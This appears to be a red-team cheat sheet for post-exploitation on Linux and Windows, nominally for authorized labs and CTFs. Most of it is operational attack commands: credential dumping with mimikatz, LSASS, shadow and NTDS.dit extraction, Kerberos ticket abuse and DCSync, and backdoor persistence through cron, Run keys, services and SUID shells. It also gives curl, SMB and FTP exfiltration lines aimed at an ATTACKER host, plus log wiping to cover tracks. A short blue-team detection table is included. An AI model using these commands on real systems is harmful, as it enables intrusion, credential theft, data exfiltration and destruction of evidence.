Post-Exploitation & Looting Playbook
Post-Exploitation & Looting Playbook — After the Shell
🧠 Use only in authorized labs or internal training. Once you gain execution or SYSTEM/root, you’re no longer proving exploitation — you’re proving control, visibility, and discipline.
I. 🧭 Core Goals
Stabilize
Convert unstable reverse shell → interactive TTY / PowerShell
Survey
Enumerate OS, network, users, environment
Loot
Dump creds, tokens, keys, configs
Persist
Establish stealthy re-entry
Exfiltrate
Collect proof/data safely
Clean
Remove artifacts, clear tracks
II. 🧩 Shell Stabilization
🐧 Linux
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm; stty raw -echo; fg🪟 Windows
powershell -ep bypass
[Console]::OutputEncoding = [Text.UTF8Encoding]::UTF8→ upgrade to Evil-WinRM, PsExec, or WMIExec for persistence.
III. 🧱 System Survey
whoami; id; uname -a; hostname
whoami /all; systeminfo
ip a; route -n; ss -tulnp
ipconfig /all; netstat -ano
cat /etc/passwd; ls /home
net users; net localgroup administrators
env; ps aux; crontab -l
set; tasklist; schtasks /query /fo LIST /v
IV. 💾 Credential Harvesting
🐧 Linux
SSH Keys
find / -name id_rsa 2>/dev/null
History Files
cat ~/.bash_history
Configs
grep -r "password" /etc /var/www /home 2>/dev/null
Databases
cat /var/www/html/config.php
System Shadow
cat /etc/shadow
Saved Tokens
grep -r "token" /home
Crack offline:
john --wordlist=rockyou.txt shadow.hashes🪟 Windows
LSASS Dump
procdump64.exe -ma lsass.exe lsass.dmp → mimikatz sekurlsa::minidump lsass.dmp
Mimikatz live
privilege::debug → sekurlsa::logonpasswords
SAM/SECURITY/SYSTEM
reg save HKLM\SAM C:\temp\SAM ... secretsdump.py -sam SAM -system SYSTEM LOCAL
Credential Manager
cmdkey /list
Browser Creds
Edge/Chrome SQLite extractions
LSA Secrets
mimikatz lsadump::secrets
🧠 Post-HTB tip: dump creds, compare, and pivot laterally using crackmapexec.
V. 🧰 Token & Ticket Manipulation (Windows)
List current tickets
klist
Dump all tickets
mimikatz kerberos::list /export
Pass-the-Ticket
mimikatz kerberos::ptt ticket.kirbi
Dump NTLM hashes
sekurlsa::msv
DCSync from DC
lsadump::dcsync /user:Administrator
VI. 🧠 Data Mining & Target Discovery
Files of Interest
find / -type f -name "*.bak" -o -name "*.conf"
Databases
MySQL: show databases; MSSQL: xp_cmdshell abuse
Documents / Flags
grep -ri "flag{" /home
Git Repos
.git/config, .git-credentials
Cloud Keys
grep -r "AWS_SECRET_ACCESS_KEY" /home
Memory Dumps
/proc/<pid>/mem extraction
AD Enumeration
net group /domain, Get-NetUser, bloodhound collection
VII. ⚙️ Privilege Persistence
🐧 Linux
Cron
echo "* * * * * root bash /tmp/back.sh" >> /etc/crontab
rc.local
Add payload before exit 0
SSH
Add key to /root/.ssh/authorized_keys
Systemd
Custom service with reverse shell
SUID Shell
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash
🪟 Windows
Registry Run Key
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "cmd /c C:\backdoor.exe"
Service Creation
sc create Updater binPath= "C:\backdoor.exe"
Scheduled Task
schtasks /create /tn "Updater" /tr "cmd /c backdoor.exe" /sc onlogon /ru SYSTEM
WMI Event Subscription
powershell Invoke-WmiEvent
DLL Hijack
Drop malicious DLL in writable service dir
VIII. 🧱 Data Exfiltration (Tame & Stealthy)
HTTP POST
curl -X POST -d @/etc/passwd http://ATTACKER:8000/upload
SMB
copy C:\loot\file.txt \\ATTACKER\share
Base64 + HTTP
`cat proof.txt
FTP
echo open ATTACKER > /tmp/x.ftp; echo put file >> /tmp/x.ftp; ftp -n -s:/tmp/x.ftp
Email (lab)
sendmail < payload
Encrypted Zip
zip -r -e loot.zip loot/
🧠 Keep proof.txt, root.txt, screenshots, and command logs only.
IX. 🧰 Forensics & Evidence Collection
Process List
ps aux
tasklist /v
Network Conns
ss -tulnp
netstat -ano
Installed Software
dpkg -l
wmic product get name,version
System Logs
/var/log/syslog, /var/log/auth.log
eventvwr.msc, Get-EventLog
User Activity
.bash_history
Prefetch, SRUM, Shimcache
X. 🧠 Post-Domain Loot (Enterprise Labs)
NTDS.dit
ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ntds" quit
SYSVOL GPP
\\DC\SYSVOL\domain\Policies\*\Machine\Preferences\Groups.xml
LAPS
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd
ADCS Templates
certipy find -u user -p pass
Domain Tickets
Rubeus dump
Group Policy Loot
parse with gpp-decrypt
XI. 🧩 Cleanup & Cover Tracks
Temp Files
rm -rf /tmp/*
del /f /q %TEMP%\*
Logs
> /var/log/auth.log
wevtutil cl System
Artifacts
unset HISTFILE
delete dropped binaries
Persistence
remove crons, tasks
remove Run keys
Tunnels
kill chisel/socat
netsh interface portproxy reset all
Clean only on sandbox/CTF machines — never in live audits without explicit authorization.
XII. 🧰 Quick One-Liners
Dump all passwords (Windows)
mimikatz "sekurlsa::logonpasswords"
Find creds in files (Linux)
grep -ri "pass" /etc /home
List scheduled tasks
schtasks /query /fo LIST /v
Check sudo rights
sudo -l
Find writable dirs
find / -writable -type d 2>/dev/null
Enumerate network
ip a && arp -a
XIII. 🧱 Reporting & Documentation Best Practice
Keep
/notes/post_exploitation.mdper box:Foothold Vector: PrivEsc Path: Creds Looted: Persistence Set: Exfil Steps: Cleanup Done:Screenshot every flag & sensitive file path.
Include hashes, commands, timestamps.
Summarize mitigation steps for blue-team understanding.
XIV. 🔒 Detection & Blue Notes (Correlated Visibility)
LSASS dump
Sysmon
10 (ProcessAccess)
SAM/NTDS read
Security
4662 (Get Changes)
Mimikatz exec
Defender / AMSI
alert signature
WMI persistence
WMI-Activity log
Event 5858
Scheduled task create
Security
4698
Registry Run key
Sysmon
13 (Registry Value Set)
SSH key mod
auditd
PATH write event
File exfil
Proxy / IDS
large POST requests
XV. 🧠 Full Post-Exploitation Flow
1️⃣ Stabilize shell (TTY / PowerShell)
2️⃣ Enumerate host & network
3️⃣ Dump creds & tokens
4️⃣ Escalate privileges if possible
5️⃣ Enumerate shares / data / configs
6️⃣ Establish persistence (controlled)
7️⃣ Exfil minimal proof data
8️⃣ Clean artifacts & document stepsLast updated
Was this helpful?